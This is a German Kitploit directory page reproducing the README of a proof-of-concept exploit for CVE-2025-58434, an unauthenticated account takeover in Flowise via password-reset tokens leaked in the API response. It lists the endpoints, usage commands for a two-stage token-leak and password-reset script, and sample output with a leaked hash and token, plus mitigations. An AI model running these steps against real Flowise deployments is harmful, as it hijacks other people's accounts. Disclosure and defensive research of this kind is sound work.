Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-58434-poc — Proof-of-Concept-Exploit für CVE-2025-58434, der die nicht authentifizierte Kontokompromittierung in Flowise über geleakte Passwort-Reset-Tokens demonstriert. Enthält einen zweistufigen Angriff: Token-Leak und Passwort-Reset. | Kitploit
Tools/GitHubGitHub/kartik2005221/cve-2025-58434-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & BildungRed Teaming
GitHubkartik2005221/cve-2025-58434-poc

CVE-2025-58434-poc

Proof-of-Concept-Exploit für CVE-2025-58434, der die nicht authentifizierte Kontokompromittierung in Flowise über geleakte Passwort-Reset-Tokens demonstriert. Enthält einen zweistufigen Angriff: Token-Leak und Passwort-Reset.

Repository anzeigen
138vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-58434 — Flowise-Kontoübernahme durch Token-Offenlegung

CVE CVSS Python License Disclosure

⚠️ Dieses Repository dient ausschließlich Bildungszwecken und autorisierter Sicherheitsforschung.
Unautorisierte Nutzung gegen Systeme, die dir nicht gehören oder für die du keine ausdrückliche Erlaubnis zum Testen hast, ist illegal.


Inhaltsverzeichnis

  • Überblick
  • Details zur Schwachstelle
  • Angriffsablauf
  • Betroffene Versionen
  • Repository-Struktur
  • Voraussetzungen
  • Installation
Verwendung
  • Beispielausgabe
  • Gegenmaßnahmen
  • Offenlegungszeitplan
  • Referenzen
  • Haftungsausschluss

  • Überblick

    Der forgot-password-Endpunkt in Flowise (sowohl cloud-gehostet als auch selbst gehostet) gibt ein gültiges Passwort-Reset-Token (tempToken) direkt im HTTP-Antworttext zurück — ohne E-Mail-Verifizierung oder Authentifizierung.

    Das bedeutet, dass ein Angreifer, der die E-Mail-Adresse eines Opfers kennt (oder erraten kann), Folgendes tun kann:

    1. Den forgot-password-Endpunkt aufrufen → das tempToken in der JSON-Antwort erhalten
    2. Mit dem tempToken den reset-password-Endpunkt aufrufen → ein beliebiges neues Passwort setzen
    3. Sich als das Opfer anmelden → vollständige Kontoübernahme (Account Takeover, ATO)

    Es sind kein vorheriger Zugriff, keine Benutzerinteraktion und kein E-Mail-Zugriff erforderlich.


    Details zur Schwachstelle

    FeldWert
    CVE IDCVE-2025-58434
    CVSS-Score9.8 (Kritisch)
    CVSS-VektorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    CWECWE-640: Schwacher Mechanismus zur Passwortwiederherstellung
    TypAuthentifizierungsumgehung / Unsichere direkte Objektreferenz
    Betroffene AppFlowise (Cloud + selbst gehostet)
    Endpunkt 1POST /api/v1/account/forgot-password
    Endpunkt 2POST /api/v1/account/reset-password

    Grundursache

    Der forgot-password-Handler gibt den vollständigen Benutzerdatensatz — einschließlich des generierten tempToken — direkt in der API-Antwort zurück, anstatt ihn nur an die registrierte E-Mail-Adresse des Benutzers zu senden.

    root@kitploit:~
    {
      "user": {
        "id": "<uuid>",
        "name": "Victim Name",
        "email": "[email protected]",
        "credential": "<bcrypt-hash>",
        "tempToken": "<LEAKED_TOKEN_HERE>",
        "tokenExpiry": "2025-08-19T13:00:33.834Z",
        "status": "active"
      }
    }
    

    Angriffsablauf

    root@kitploit:~
    Attacker                              Flowise API
       │                                       │
       │  POST /forgot-password {email}        │
       │──────────────────────────────────────►│
       │                                       │  (generates tempToken)
       │◄──────────────────────────────────────│
       │  201 { tempToken: "abc123..." }       │
       │                                       │
       │  POST /reset-password {email,         │
       │         tempToken, newPassword}       │
       │──────────────────────────────────────►│
       │                                       │
       │◄──────────────────────────────────────│
       │  200 OK  (password changed!)          │
       │                                       │
       ✓  Account Takeover Complete
    

    Betroffene Versionen

    • Flowise Cloud (cloud.flowiseai.com) — bestätigt betroffen
    • Alle selbst gehosteten Flowise-Bereitstellungen vor dem Patch

    Informationen zu gepatchten Releases findest du im offiziellen Flowise-GitHub-Repository.


    Repository-Struktur

    root@kitploit:~
    CVE-2025-58434/
    ├── cve_2025_58434_poc.py   # Main PoC script (two-stage ATO)
    ├── requirements.txt         # Python dependencies
    ├── README.md                # This file
    └── DISCLAIMER.md            # Legal notice (read before use)
    

    Voraussetzungen

    • Python 3.7 oder höher
    • requests-Bibliothek

    Installation

    root@kitploit:~
    # Clone the repository
    git clone https://github.com/yourhandle/CVE-2025-58434
    cd CVE-2025-58434
    
    # Install dependencies
    pip install -r requirements.txt
    

    Verwendung

    Hilfebildschirm

    root@kitploit:~
    python3 cve_2025_58434_poc.py --help
    

    Phase 1 — Token auslesen (Aufklärung)

    Bestätige, dass die Instanz verwundbar ist, und rufe das tempToken ab, ohne ein Passwort zurückzusetzen.

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected]
    

    Phase 2 — Vollständige Kontoübernahme

    Verwende das geleakte Token, um das Passwort sofort zurückzusetzen.

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected] \
      --reset \
      --new-password "MyNewP@ss2025!"
    

    Rohe JSON-Antwort ausgeben

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected] \
      --json-output
    

    Alle Optionen

    FlagKurzBeschreibungStandard
    --url URL-uBasis-URL der Flowise-Instanz(erforderlich)
    --email EMAIL-eE-Mail-Adresse des Zielkontos(erforderlich)
    --reset-rPhase 2 ausführen: Passwort mit geleaktem Token zurücksetzenFalse
    --new-password PASS-pNeues zu setzendes Passwort (wird mit --reset verwendet)Changeme@2025!
    --timeout SECONDS-tHTTP-Request-Timeout10
    --json-output-jRoh-JSON-Antwort auf stdout ausgebenFalse

    Beispielausgabe

    root@kitploit:~
      [Step 1] Sending forgot-password request …
      [*] HTTP Status : 201
    
      ========================================================================
        LEAKED ACCOUNT DATA
      ========================================================================
        User ID       : 3fa1c2d4-xxxx-xxxx-xxxx-xxxxxxxxxxxx
        Name          : Admin User
        Email         : [email protected]
        Credential    : $2b$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
        Status        : active
        tempToken     : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
        tokenExpiry   : 2025-08-19T13:00:33.834Z
      ========================================================================
    
      [+] tempToken obtained  : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
      [!] VULNERABLE: The instance leaks password reset tokens unauthenticated!
    

    Gegenmaßnahmen

    Wenn du Betreiber einer Flowise-Instanz bist, wende sofort die folgenden Gegenmaßnahmen an:

    1. Gib Reset-Tokens niemals in API-Antworten zurück. Sende das Token ausschließlich an die registrierte E-Mail-Adresse.
    2. Gib eine generische Erfolgsmeldung von forgot-password zurück, unabhängig davon, ob die E-Mail existiert — dies verhindert auch die Kontobestandsermittlung (Account Enumeration).
    3. Erzwinge Token-Einschränkungen:
      • Einmalige Verwendung (nach erstem Gebrauch ungültig machen)
      • Kurze Gültigkeitsdauer (z. B. 15 Minuten)
      • Wo möglich an die anfragende IP / den User-Agent gebunden
    4. Wende den Fix auf alle Bereitstellungsmodelle an — Cloud und selbst gehostet.
    5. Füge Rate-Limiting für den forgot-password-Endpunkt hinzu.
    6. Protokolliere und alarmiere bei ungewöhnlicher Passwort-Reset-Aktivität.
    7. Ziehe MFA für Administrator- und Konten mit hohen Privilegien in Betracht.

    Offenlegungszeitplan

    DatumEreignis
    2025-08-19Schwachstelle entdeckt und gemeldet
    TBDBestätigung durch den Hersteller
    TBDPatch veröffentlicht
    TBDÖffentliche Offenlegung

    Referenzen

    • GitHub Advisory GHSA-wgpv-6j63-x5ph
    • NVD — CVE-2025-58434
    • Flowise GitHub Repository
    • CWE-640: Schwacher Mechanismus zur Passwortwiederherstellung

    Haftungsausschluss

    Dieses Projekt dient ausschließlich Bildungszwecken und autorisierten Penetrationstests.

    • Führe dieses Tool NICHT gegen ein System aus, ohne ausdrückliche schriftliche Genehmigung des Systeminhabers.
    • Die Autoren dieses Repositorys übernehmen keinerlei Verantwortung für Missbrauch, Schäden oder rechtliche Konsequenzen, die aus unbefugter Nutzung entstehen.
    • Den vollständigen rechtlichen Hinweis findest du in DISCLAIMER.md.
    Tool herunterladen